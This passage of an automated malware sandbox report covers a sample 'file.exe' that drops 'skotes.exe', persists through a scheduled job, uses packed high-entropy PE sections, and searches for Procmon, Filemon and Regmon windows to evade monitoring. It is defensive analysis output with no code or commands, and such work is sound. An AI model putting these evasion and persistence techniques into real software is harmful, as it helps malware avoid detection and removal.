Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Google Drive.lnk.9.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.9.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.9.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.9.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.9.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.9.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: file.exe Static file information: File size 1921024 > 1048576
Source: file.exe Static PE information: Raw size of dkmnrssd is bigger than: 0x100000 < 0x1a3400

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.310000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dkmnrssd:EW;tqafgssw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dkmnrssd:EW;tqafgssw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.ec0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dkmnrssd:EW;tqafgssw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dkmnrssd:EW;tqafgssw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 3.2.skotes.exe.ec0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dkmnrssd:EW;tqafgssw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dkmnrssd:EW;tqafgssw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 6.2.skotes.exe.ec0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dkmnrssd:EW;tqafgssw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dkmnrssd:EW;tqafgssw:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: file.exe Static PE information: real checksum: 0x1d9e2d should be: 0x1e3ff7
Source: skotes.exe.0.dr Static PE information: real checksum: 0x1d9e2d should be: 0x1e3ff7
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: dkmnrssd
Source: file.exe Static PE information: section name: tqafgssw
Source: file.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: dkmnrssd
Source: skotes.exe.0.dr Static PE information: section name: tqafgssw
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00EDD91C push ecx; ret 6_2_00EDD92F
Source: file.exe Static PE information: section name: entropy: 7.985416397888055
Source: file.exe Static PE information: section name: dkmnrssd entropy: 7.954101495285281
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.985416397888055
Source: skotes.exe.0.dr Static PE information: section name: dkmnrssd entropy: 7.954101495285281
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
